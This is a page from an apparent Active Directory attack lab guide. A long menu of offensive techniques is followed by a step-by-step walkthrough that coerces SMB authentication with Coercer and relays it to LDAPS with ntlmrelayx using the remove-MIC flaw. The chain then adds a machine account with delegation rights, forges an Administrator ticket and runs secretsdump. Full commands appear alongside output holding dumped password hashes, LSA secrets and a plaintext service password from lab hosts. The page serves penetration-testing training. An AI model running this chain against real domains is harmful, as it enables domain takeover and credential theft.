Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Installation
  • Start the Relay
  • LEt's corece
  1. Exploiting With Poison and Relay

Coerced auth smb + ntlmrelayx to ldaps with drop the mic

PreviousPass the Hash with CrackMapExecNextUser Enumeration Exploit

Last updated 2 years ago

We can coerce a connection from Baltimore DC to our host using multiple methods (petitpotam, printerbug, DFSCoerce). To force a coerce without choosing between the different methods, we can use the all-in-one tool who just came up

As explained beautifully in the hackndo blog () and in the hacker receipe (), you can’t relay smb connection to ldap(s) connection without using CVE-2019-1040 a.k.a remove-mic.

  • Start the relay with remove mic to the ldaps of baltimore.maryland.local.

  • Run the coerce authentication on Salsibury(Salisbury is a windows server 2016 up to date so petitpotam unauthenticated will not work here)

Installation

You can now install it from pypi (latest version is ) with this command:

sudo python3 -m pip install coercer

Collecting coercer
  Downloading coercer-2.4-py3-none-any.whl (49 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
 
 *] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy

Start the Relay

sudo ntlmrelayx.py -t ldaps://baltimore.maryland.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access

LEt's corece

Coercer coerce -u joaquin.Pereida -d maryland.local -p horse -t salisbury.maryland.local -l 192.168.56.31

  • The attack worked we can now exploit Salisbury with RBCD by getting the service principal name -spn for Administrator

sudo getST.py -spn HOST/salisbury.maryland.local -impersonate Administrator -dc-ip 192.168.56.12 'MARYLAND.LOCAL/removemiccomputer$:*mHcnugW1<KF8Oq'
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

  • and use that ticket to retrieve dump the sam database from Salisbury Server..

export KRB5CCNAME=/workspace/Administrator.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'Administrator'@salisbury.maryland.local'




Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6d1ece16a534e660a94480bd6f2a32
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:84fe45d7c3263065e931761aef6c7aaf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARYLAND.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a
MARYLAND.LOCAL/joaquin.Pereida:$DCC2$10240#joaquin.Pereida#39dfbbbb2ff73c019c37498e96708c37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
maryland\SALISBURY$:plain_password_hex:2100480079004f0060003800600078002b006300270058003e0056004f003c003c004a005100520039005e007a0043005b004d0038005000390073004b00780057003e004800300026004c003b0040004300330055003b00450045006900260046006400700031004c002e00450028002300290045006e0074003d005f005500550051002300760073004a0031002b0078004c0055002100500043004f005b00380072006b005a002d0055002000230032005e004d005a006a006900470044002e0066003c003a0040004b00310079002f0075002e0078005a0063002a002f00690052006f0034003800700041003800
maryland\SALISBURY$:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0810ead1cae293ee405b7051a9d3a3a3b8afbc0b
dpapi_userkey:0x39f7f79d4d6d8889ba4f1c5bf55a42429702eded
[*] NL$KM 
 0000   26 72 00 BB 64 CB DD D7  34 20 B4 AC 7E 9A 99 05   &r..d...4 ..~...
 0010   75 95 40 EF C7 ED 72 3E  F4 66 93 E7 3D C9 B8 56   u.@...r>.f..=..V
 0020   EC E8 6E 4E 40 13 86 34  A8 F6 E6 36 C6 71 9F 7A   ..nN@..4...6.q.z
 0030   8F 63 A3 23 D9 37 A0 BC  07 C0 0B 06 41 21 5E 64   .c.#.7......A!^d
NL$KM:267200bb64cbddd73420b4ac7e9a9905759540efc7ed723ef46693e73dc9b856ece86e4e40138634a8f6e636c6719f7a8f63a323d937a0bc07c00b0641215e64
[*] _SC_MSSQL$SQLEXPRESS 
maryland.local\sql_svc:YouWillNotKerboroast1ngMeeeeee
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
coercer
en.hackndo.com/ntlm-relay
www.thehacker.recipes/ad/movement/ntlm/relay
PyPI